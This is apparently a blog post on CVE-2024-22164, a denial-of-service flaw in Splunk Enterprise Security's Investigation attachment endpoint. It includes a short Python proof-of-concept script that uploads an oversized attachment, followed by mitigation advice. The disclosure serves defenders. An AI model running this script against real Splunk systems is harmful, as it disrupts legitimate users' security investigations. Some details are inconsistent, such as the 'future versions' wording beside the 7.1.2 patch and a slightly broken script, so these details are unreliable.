CVE-2024-22164 - Denial of Service Vulnerability in Splunk Enterprise Security (ES) Versions Below 7.1.2

In this long-read post, we will discuss a recently discovered vulnerability in Splunk Enterprise Security (ES) versions below 7.1.2. Identified by the Common Vulnerabilities and Exposures (CVE) ID CVE-2024-22164, this vulnerability allows an attacker to perform a denial of service (DoS) attack on the Investigation feature of Splunk ES by using investigation attachments.

We'll delve into the specifics of this vulnerability, provide a code snippet demonstrating the potential exploit, and discuss ways you can mitigate this risk in your own ES environment. We'll also include references to original sources and further reading for those interested in learning more about this issue.

Vulnerability Details

In Splunk ES versions below 7.1.2, the Investigation feature, which is used for conducting collaborative security investigations, contains a vulnerability in its attachment endpoint. This endpoint doesn't properly limit the size of the requests it processes, which may allow an attacker to upload a large investigation attachment and cause the Investigation to become inaccessible for other users.

Exploit

To exploit this vulnerability, an attacker would need to craft a request with a large investigation attachment and send it to the affected attachment endpoint, which would be processed without any proper size limitation checks. This can potentially cause the Investigation to become unresponsive or inaccessible, effectively denying legitimate users access to the feature.

Here's a code snippet showing a potential exploit using the Python Requests library

import requests

# Replace the following with your Splunk ES instance URL and API token
splunk_url = "https://your_splunk_instance_url";
api_token = "your_api_token"

headers = {
    "Authorization": f"Splunk {api_token}",
    "Content-Type": "multipart/form-data"
}

# Craft a large investigation attachment by repeating a sample text
large_attachment = ("Sample text to fill the attachment " * 100000).encode("UTF-8")

# Prepare the request payload for the attachment endpoint
payload = {
    "attachment": ("attachment.txt", large_attachment)
}

# Send the request to the affected attachment endpoint
response = requests.post(f"{splunk_url}/services/investigation/attachment", headers=headers, files=payload)

if response.status_code == 201:
    print("Investigation attachment successfully uploaded.")
else:
    print("Error uploading attachment.")

Mitigations

Until the vulnerability is fixed in future versions of Splunk ES, it is recommended to update your Splunk ES installation to version 7.1.2, which contains a patch for this issue. You can download the updated version from the Splunk website at this link.

If you cannot currently update your ES instance, it is advised to monitor and control access to the Investigation attachment endpoint by implementing access controls, such as IP-based restrictions, user roles, or other authentication mechanisms suited to your environment.

For more information about this vulnerability, you can refer to the following sources

- CVE-2024-22164 entry on the CVE List
- Splunk Security Advisory
- Splunk's Documentation on Investigation Feature

Conclusion

CVE-2024-22164 represents a potentially serious vulnerability in Splunk ES versions below 7.1.2 that could allow an attacker to cause a denial of service to the Investigation feature using investigation attachments. To protect your environment from potential exploitation, it is recommended to update your Splunk ES installation to version 7.1.2 or later and closely monitor and control access to the Investigation attachment endpoint.

Timeline

Published on: 01/09/2024 17:15:12 UTC
Last modified on: 01/16/2024 17:40:17 UTC